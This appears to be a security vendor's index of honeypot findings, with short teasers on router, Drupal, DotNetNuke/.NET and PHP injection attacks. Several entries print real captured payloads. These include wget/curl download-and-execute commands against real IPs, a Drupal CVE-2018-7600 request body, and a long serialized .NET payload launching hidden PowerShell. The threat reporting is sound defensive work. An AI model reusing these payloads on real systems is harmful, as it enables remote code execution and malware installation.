Advanced Threat Detection in Phishing Email Attachments
Advanced Threat Detection in Phishing Email Attachments by CloudCoffer
The honeypots apply AI to extract unknown attacks from traffic.
Advanced Threat Detection in Phishing Email Attachments by CloudCoffer
CloudCoffer researchers have discovered that an increasing amount of malware is being placed on services like GitHub, Dropbox, Google Drive, OneDrive, and Discord. These malicious programs evade the detection tools of these platforms through encryption and obfuscation. Hackers then exploit system vulnerabilities or use social engineering to implant these programs on victim systems. Many of Read more about Hackers infiltrate systems using GitHub[…]
Date of Detection: 2018.5.24 Attack Pattern: URI: /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ Malware: The malware is placed at this IP address: 185.62.190.191. Target System: D-Link DSL-2750B Analysis: Attackers first exploit vulnerable systems and then control them with malware. Failing to validate users’ inputs, the affected routers can be controlled by remote attackers, without credentials. Due Read more about D-Link Router Vulnerability[…]
Date of Detection: 2018.3.29 Attack Pattern: URI: /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax Request Body: form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec& mail%5B%23type%5D=markup&mail%5B%23markup%5D=wget%20http%3A%2F%2F51.254.219.134%2Fdrupal.php Target System: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code. Analysis: This issue is not a zero-day vulnerability and assigned as CVE-2018-7600. However, attackers are scanning and Read more about Widespread Drupal Arbitrary Code Execution[…]
Date of Detection: 2018.1.30 Description: Cryptocurrency mining becomes more and more popular. Attackers are widely exploiting victims’ systems to mine digital currencies and making profits. According to the news report on February 21st, 2018, even Tesla cloud resources are hacked to run cryptocurrency-mining malware. As CloudCoffer’s honeypots keep detecting this type of exploit and Read more about Honeypot Extraction – Digital Currency Mining[…]
Date of Detection: 2017.12.11 Source IP Addresses: 173.212.217.181、149.255.35.91 Attack Raw Pattern: DNNPersonalization=<profile><item key=\”key\” type=\”System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\”><ExpandedWrapperOfObjectStateFormatterObjectDataProvider> <ProjectedProperty0> <ObjectInstance p3:type=\”ObjectStateFormatter\” xmlns:p3=\”http://www.w3.org/2001/XMLSchema-instance\” /> <MethodName>Deserialize</MethodName> <MethodParameters> <anyType xmlns:q1=\”http://www.w3.org/2001/XMLSchema\” p5:type=\”q1:string\” xmlns:p5=\”http://www.w3.org/2001/XMLSchema-instance\”>/wEy8ykAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAAoRgvYyBDOlxXaW5kb3dzXFN5c3RlbTMyXFdpbmRvd3NQb3dlclNoZWxsXHYxLjBccG93ZXJzaGVsbC5leGUgLVdpbmRvd1N0eWxlIEhpZGRlbiAtZW5jb2RlIEpBQmxBRDBBSndCTEFFRUFRUUJ0QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVrQVFRQm1BRkVBUWdBM0FFRUFSQUJCQUVFQVpnQlJBRUVBYVFCQkFFTUFNQUJCQUZvQVp3QkJBR2NBUVFCREFHTUFRUUJhQUZFQVFnQnFBRUVBU0FCUkFFRUFTZ0IzQUVFQWN3QkJBRU1BWXdCQkFGUUFad0JDQUd3QVFRQklBR01BUVFCS0FIY0FRUUJ6QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVFQVFRQm1BRkVBUVFCcEFFRUFRd0JCQUVFQVRBQlJBRUlBYlFCQkFFTUFZd0JCQUdFQVp3QkJBRzRBUVFCREFIY0FRUUJLQUhjQVFRQjBBRUVBUlFBNEFFRUFXUUJuQUVFQWJnQkJBRU1BYXdCQkFFc0FVUUJCQUdjQVFRQkRBR2NBUVFCSkFHY0FRZ0EzQUVFQVJBQkZBRUVBWmdCUkFFSUFOd0JCQUVRQVNRQkJBR1lBVVFCQ0FEY0FRUUJFQUUwQVFRQm1BRkVBUWdBM0FFRUFSQUJSQUVFQVpnQlJBRUlBTndCQkFFUUFRUUJCQUdZQVVRQkJBR2tBUVFCREFEQUFRUUJhQUdjQVFRQm5BRUVBUXdCakFFRUFZZ0JuQUVJQU1BQkJBRU1BWXdCQkFFd0FRUUJCQUc0QVFRQkdBRTBBUVFCS0FIY0FRUUJ6QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVFQVFRQm1BRkVBUVFCcEFFRUFRd0JCQUVFQVRBQlJBRUlBYlFCQkFFTUFZd0JCQUdRQVFRQkNBR3dBUVFCREFHTUFRUUJNQUVFQVFRQnVBRUVBU0FCckFFRUFZd0IzQUVFQWJnQkJBRU1BYXdCQkFFd0FRUUJCQUc4QVFRQkRBRWtBUVFCbEFIY0FRUUIzQUVFQVNBQXdBRUVBWlFCM0FFRUFlUUJCQUVnQU1BQkJBR1VBZHdCQkFIZ0FRUUJJQURBQVFRQkpBR2NBUVFCMEFFRUFSd0JaQUVFQVNnQjNBRUlBZEFCQkFFTUFZd0JCQUV3QVFRQkJBRzRBUVFCSEFGVUFRUUJaQUdjQVFnQkVBRUVBUndCM0FFRUFZUUJSQUVFQWJnQkJBRU1BZHdCQkFFb0Fkd0JCQUhVQVFRQkZBRFFBUVFCYUFGRUFRZ0F3QUVFQVF3QTBBRUVBVmdCM0FFRUFiZ0JCQUVNQWF3QkJBRXdBUVFCQkFHNEFRUUJIQUZVQVFRQktBSGNBUVFCd0FFRUFRd0JyQUVFQVRBQm5BRUVBYndCQkFFTUFTUUJCQUdVQWR3QkJBSGdBUVFCSUFEQUFRUUJsQUhjQVFRQjZBRUVBU0FBd0FFRUFaUUIzQUVFQWVRQkJBRWdBTUFCQkFHVUFkd0JCQUhjQVFRQklBREFBUVFCSkFHY0FRUUJuQUVFQVF3QXdBRUVBV2dCbkFFRUFad0JCQUVNQVp3QkJBRWtBWndCQ0FEY0FRUUJFQUVVQVFRQm1BRkVBUWdBM0FFRUFSQUJCQUVFQVpnQlJBRUlBTndCQkFFUUFTUUJCQUdZQVVRQkJBR2tBUVFCREFFRUFRUUJNQUZFQVFnQnRBRUVBUXdCakFFRUFaQUJCQUVJQWVRQkJBRWNBYXdCQkFFb0Fkd0JCQUhNQVFRQkRBR01BUVFCWkFGRUFRZ0JyQUVFQVJnQk5BRUVBU2dCM0FFRUFjd0JCQUVNQVl3QkJBR0lBWndCQ0FHNEFRUUJEQUdNQVFRQkxBRkVBUVFCekFFRUFRd0JqQUVFQVVnQkJBRUVBYmdCQkFFTUFkd0JCQUVzQVFRQkJBR2tBUVFCSUFITUFRUUJOQUZFQVFnQTVBRUVBU0FCekFFRUFUUUJCQUVJQU9RQkJBRU1BU1FCQkFFa0FRUUJCQUhRQVFRQkhBRmtBUVFCS0FIY0FRZ0IxQUVFQVJ3QjNBRUVBWWdCM0FFRUFiZ0JCQUVNQWR3QkJBRW9BZHdCQ0FETUFRUUJEQUdNQVFRQkxBRkVBUVFCekFFRUFRd0JqQUVFQVlnQjNBRUVBYmdCQkFFTUFhd0JCQUV3QVp3QkJBR2tBUVFCSEFHc0FRUUJaQUVFQVFnQlBBRUVBUmdCWkFFRUFWQUIzQUVJQVp3QkJBRVVBY3dCQkFGb0FVUUJCQUdrQVFRQkRBR2NBUVFCTEFFRUFRUUJwQUVFQVNBQnpBRUVBVFFCQkFFSUFPUUJCQUVnQWN3QkJBRTRBUVFCQ0FEa0FRUUJJQUhNQVFRQk5BSGNBUWdBNUFFRUFTQUJ6QUVFQVRRQm5BRUlBT1FCQkFFZ0Fjd0JCQUU0QVVRQkNBRGtBUVFCSUFITUFRUUJOQUZFQVFnQTVBRUVBUXdCSkFFRUFUQUJSQUVJQWJRQkJBRU1BUVFCQkFFc0FRUUJCQUdrQVFRQklBSE1BUVFCTkFFRUFRZ0E1QUVFQVNBQnpBRUVBVFFCUkFFSUFPUUJCQUVNQVNRQkJBRWtBUVFCQkFIUUFRUUJIQUZrQVFRQktBSGNBUWdCdkFFRUFTQUJSQUVFQVpBQkJBRUVBYmdCQkFFTUFkd0JCQUVvQWR3QkNBSGNBUVFCRUFHOEFRUUJLQUhjQVFRQndBRUVBUXdCM0FFRUFTZ0IzQUVJQWR3QkJBRWdBVFFCQkFFMEFVUUJCQUc0QVFRQkRBSGNBUVFCS0FIY0FRUUF6QUVFQVJ3QnZBRUVBU2dCM0FFRUFjd0JCQUVNQVl3QkJBRm9BVVFCQ0FIUUFRUUJIQUZVQVFRQktBSGNBUVFCekFFRUFRd0JuQUVFQVNRQm5BRUlBTndCQkFFUUFRUUJCQUdZQVVRQkNBRGNBUVFCRUFFVUFRUUJtQUZFQVFRQnBBRUVBUXdBd0FFRUFXZ0JuQUVFQWJnQkJBRU1BT0FCQkFFd0Fkd0JDQURNQVFRQklBR01BUVFCa0FIY0FRUUIxQUVFQVF3QmpBRUVBVEFCQkFFRUFiZ0JCQUVjQVZRQkJBRW9BZHdCQkFIQUFRUUJEQUhjQVFRQkxBRUVBUVFCcEFFRUFTQUJ6QUVFQVRRQkJBRUlBT1FCQkFFZ0Fjd0JCQUUwQVVRQkNBRGtBUVFCREFFa0FRUUJNQUZFQVFnQnRBRUVBUXdCQkFFRUFTZ0IzQUVFQWRRQkJBRWdBWXdCQkFHRUFVUUJDQUhVQVFRQkRBRGdBUVFCakFIY0FRZ0JxQUVFQVF3QmpBRUVBVEFCQkFFRUFiZ0JCQUVnQVdRQkJBRXdBWndCQkFHNEFRUUJEQUdzQVFRQkxBRkVBUVFCd0FFRUFTQUIzQUVFQVRBQm5BRUVBYndCQkFFTUFTUUJCQUdVQWR3QkJBSGdBUVFCSUFEQUFRUUJsQUhjQVFRQjNBRUVBU0FBd0FFRUFTUUJuQUVFQWRBQkJBRWNBV1FCQkFFb0Fkd0JDQUd3QVFRQklBR2NBUVFCS0FIY0FRUUJ6QUVFQVF3QmpBRUVBWVFCUkFFRUFiZ0JCQUVNQWF3QkJBQ2NBT3dBZ0FITUFkQUJoQUhJQWRBQWdBRU1BT2dCY0FGY0FhUUJ1QUdRQWJ3QjNBSE1BWEFCVEFIa0Fjd0IwQUdVQWJRQXpBRElBWEFCWEFHa0FiZ0JrQUc4QWR3QnpBRkFBYndCM0FHVUFjZ0JUQUdnQVpRQnNBR3dBWEFCMkFERUFMZ0F3QUZ3QWNBQnZBSGNBWlFCeUFITUFhQUJsQUd3QWJBQXVBR1VBZUFCbEFDQUFMUUJYQUdrQWJnQmtBRzhBZHdCVEFIUUFlUUJzQUdVQUlBQklBR2tBWkFCa0FHVUFiZ0FnQUNjQUxRQmxBRzRBWXdCdkFHUUFaUUFuQUN3QUlBQWtBR1VBSUFBZ0FDQUEGBwAAABtDOlxXaW5kb3dzXFN5c3RlbTMyXGNtZC5leGUEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw==</anyType> </MethodParameters> </ProjectedProperty0> </ExpandedWrapperOfObjectStateFormatterObjectDataProvider></item></profile>; Target System: Windows with .NET Framework Malicious File Path from the Read more about Honeypot Extraction -Windows .NET Framework[…]
Date of Detection: 2017.11.20 Source IP Addresses: 27.255.77.103 Attack Raw Pattern: After decoding URL, the pattern is as follows. <? system(“cd /tmp ; wget http://175.126.167.52/apache.txt ; curl -O http://175.126.167.52/apache.txt ; fetch http://175.126.167.52/apache.txt ; chmod +x apache.txt ; perl apache.txt ; rm -rf apache.txt ; history -c “); ?> Malicious File Path from the Read more about Honeypot Extraction -Command Injection[…]